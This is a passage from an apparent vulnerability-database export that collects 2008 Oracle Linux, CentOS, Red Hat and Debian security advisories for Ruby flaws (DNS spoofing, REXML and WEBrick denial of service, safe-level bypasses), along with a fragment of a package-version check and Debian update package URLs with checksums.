isdpkgvuln(pkg:\"libgdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.9\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-dev\", ver:\"1.9.0+20060609-1etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "[1.8.5-5.el5_2.5]\n- Build with -fno-strict-aliasing.\n[1.8.5-5.el5_2.4]\n- security fixes. (#461590)\n- CVE-2008-3655: multiple insufficient safe mode restrictions.\n- CVE-2008-3656: WEBrick DoS vulnerability (CPU consumption).\n- CVE-2008-3657: missing taintness checks in dl module.\n- CVE-2008-3905: use of predictable source port and transaction id in DNS\n requests done by resolv.rb module.\n- CVE-2008-3443: Memory allocation failure in Ruby regex engine\n (remotely exploitable DoS).\n- CVE-2008-3790: DoS vulnerability in the REXML module.", "edition": 4, "modified": "2008-10-21T00:00:00", "published": "2008-10-21T00:00:00", "id": "ELSA-2008-0897", "href": "http://linux.oracle.com/errata/ELSA-2008-0897.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3656"], "description": "[1.8.5-5.el5_2.6]\n- security fix (#470262)\n- CVE-2008-4310: real fix for CVE-2008-3656. original patch named as fix for\n CVE-2008-3656 actually fixed different issue (CVE-2008-1145),\n hence we are providing correct patch and renaming original\n patch to refer to proper CVE.", "edition": 4, "modified": "2008-12-04T00:00:00", "published": "2008-12-04T00:00:00", "id": "ELSA-2008-0981", "href": "http://linux.oracle.com/errata/ELSA-2008-0981.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3905"], "description": "[1.6.8-13.el3]\n- security fixes. (#461578)\n- CVE-2008-3655: multiple insufficient safe mode restrictions\n- CVE-2008-3443: Memory allocation failure in Ruby regex engine (remotely exploitable DoS)\n- CVE-2008-3905: use of predictable source port and transaction\n id in DNS requests done by resolve.rb module.", "edition": 4, "modified": "2008-10-21T00:00:00", "published": "2008-10-21T00:00:00", "id": "ELSA-2008-0896", "href": "http://linux.oracle.com/errata/ELSA-2008-0896.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:26:44", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0897\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027378.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027379.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027383.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027387.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027392.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027393.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-irb\nruby-libs\nruby-mode\nruby-rdoc\nruby-ri\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0897.html", "edition": 5, "modified": "2008-10-28T10:37:20", "published": "2008-10-24T00:04:31", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/027378.html", "id": "CESA-2008:0897", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-17T03:28:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-3905"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0896\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027370.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027371.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027381.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027385.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-libs\nruby-mode\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0896.html", "edition": 5, "modified": "2008-10-24T18:02:11", "published": "2008-10-21T16:06:28", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/027370.html", "id": "CESA-2008:0896", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:26:14", "bulletinFamily": "unix", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0981\n\n\nRuby is an extensible, interpreted, object-oriented, scripting language. It\nhas features to process text files and to do system management tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially-crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain a\ncorrect patch that resolves this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027503.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027504.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027511.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027512.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027552.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-December/027553.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-irb\nruby-libs\nruby-mode\nruby-rdoc\nruby-ri\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0981.html", "edition": 3, "modified": "2008-12-23T15:38:41", "published": "2008-12-05T16:16:47", "href": "http://lists.centos.org/pipermail/centos-announce/2008-December/027503.html", "id": "CESA-2008:0981", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:27:41", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3443"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0895-02\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027374.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-libs\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 4, "modified": "2008-10-22T04:31:37", "published": "2008-10-22T04:31:37", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/027374.html", "id": "CESA-2008:0895-02", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-12-11T13:31:17", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1145", "CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3656", "CVE-2008-3657", "CVE-2008-3790", "CVE-2008-3905"], "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-09-08T11:51:21", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0897", "href": "https://access.redhat.com/errata/RHSA-2008:0897", "type": "redhat", "title": "(RHSA-2008:0897) Moderate: ruby security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3905"], "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-07-28T18:43:40", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0896", "href": "https://access.redhat.com/errata/RHSA-2008:0896", "type": "redhat", "title": "(RHSA-2008:0896) Moderate: ruby security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3656", "CVE-2008-4310"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It\nhas features to process text files and to do system management tasks.\n\nVincent Danen reported, that Red Hat Security Advisory RHSA-2008:0897\ndid not properly address a denial of service flaw in the WEBrick (Ruby\nHTTP server toolkit), known as CVE-2008-3656. This flaw allowed a\nremote attacker to send a specially-crafted HTTP request to a WEBrick\nserver that would cause the server to use excessive CPU time. This\nupdate properly addresses this flaw. (CVE-2008-4310)\n\nAll Ruby users should upgrade to these updated packages, which contain a\ncorrect patch that resolves this issue.", "modified": "2017-09-08T12:09:30", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:0981", "href": "https://access.redhat.com/errata/RHSA-2008:0981", "type": "redhat", "title": "(RHSA-2008:0981) Moderate: ruby security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3443", "CVE-2008-3655"], "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2018-03-14T19:26:59", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0895", "href": "https://access.redhat.com/errata/RHSA-2008:0895", "type": "redhat", "title": "(RHSA-2008:0895) Moderate: ruby security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:30:53", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1652-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.9\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WebRick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taintness\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.9.0+20060609-1etch3. Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.9.0.2-6.\n\nWe recommend that you upgrade your ruby1.9 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz\n Size/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.diff.gz\n Size/MD5 checksum: 32500 f9ecc42746b8a277f0adf684db941813\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.dsc\n Size/MD5 checksum: 1102 d9f8325a51dc85e7a592135602aa5adb\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 318568 8829c7b1dc51b1694ec44c22df0b9aa2\n http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 255728 98a8ba887948dad97e365d6fe4cd7365\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 265788 baf95223f575afea5a19eda8931ab20f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 229404 5fd60bd0423a2bf3e7b7d9f2fdbf50f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 694282 195e55b70aaf9f35ff0b3156460c05a0\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217526 18e248f393c0157029127735d35ab58c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 237710 40f6ac2464dd488bcec0d9e705457071\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 324622 3daf8b07570c96d9575c851ab21deae3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 340188 8e9d2e6f51f659ad6df94a11961b6429\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1890052 15fa703f9493159f200bc8719305f8f7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 216796 19318b591b6bce163cd767ccbc8e55a0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1881332 5b980e23f25edf7bbc978bbdfb2ffa18\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217544 96ac4e52a0ddbf2a70ae8a49b8468338\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 961014 16b8cfc9ec220aed8a4a6d83b7a903f3\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216496 a612ba557549caf4ba25abe252da8568\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 346006 8ea61f15325461d26752621150af4c55\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1878306 97b41d5d6a9d13ceab9139faf6ec9f36\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 235552 8767d4d810273a9f0177a47a0a08c073\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1850520 0750131f3c14ce426f121099858f02f0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216560 5eb826cce7459050017b7085685e996c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216012 d89ffb0add351472565804edf8dac758\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 807498 f23ac4d1e46337667e6869d896a2c86a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 323396 fd36007f61327bb9e05127cd35e6a2d6\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 888820 f2a52e9d4019c7c6e36df9a557bb2162\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217900 86d51cf0dc80bdbd9d25a39b17eee678\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217536 3ee4c34f85a0dd8b4f8a328a5e8fbc00\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1861420 68df4ad96fd1065b76bf391d753ad79e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 236956 e465433f9cb8186a8326455d59910cc2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1880706 d811527595c9c70569d60581b0b540ea\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 218086 0fc503ce1be877ddcf1ed5110ebc35f5\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 333712 e26dd25bc69b683518214ffda7aa18fc\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 395486 d89dec7193f96ac9ea999af10815b0e4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 309582 1e3e3abbe9099df9839f022207104e4c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216578 6c8c40b3bac4b3008ca37c11d1c15b71\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216352 7ad6c7c069d6922eadc2d51919f42346\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1752688 4c1a4ec5f90608f16b719070239f2dc8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1867752 749baa15c5cdd78016acc2e4a4836f80\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 237500 068288ec56066aad6cd3c0148fa9e6b1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 345708 f01d2d77673b54570e3afcf06afb7bb4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 215600 47671e30dd1a142519c40c1efc6559b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 757964 c34682888461aa146d404c9dccb9f987\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 2225874 c1f834cdd95279bbf5eca576c3511088\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220606 3c65aba37358087e1e26a16677e474f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1095774 6d57aff7a609eb69ea57dfeb60b9d831\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220140 46554d54bc95ad8bf90ec33d7c848358\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 236300 1e4719db3ca36aa6b04dc3a66bb3b4f2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220598 3cff195de849212b8bf1c0d2cb4f459b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351424 99c548dbb54ad64f2f15ec9d6cd1157b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351114 67c71c75847c6c24873a077214c6ddb8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1863980 ba885ff9a4bee389cdda5439f9b8838d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 216034 540daf8a0a152b77cbabc0ebf2a6cbe6\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215910 08152af050881fd103cbd3c6283f4c5f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215178 6189e81e3d1fcb8bc3aa64ae688c6736\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1862054 3f09c78df3df2ecafca65180509eeb30\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 236092 0a9c0b2b8031289e850c3a2c9a026e92\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mips.deb\n 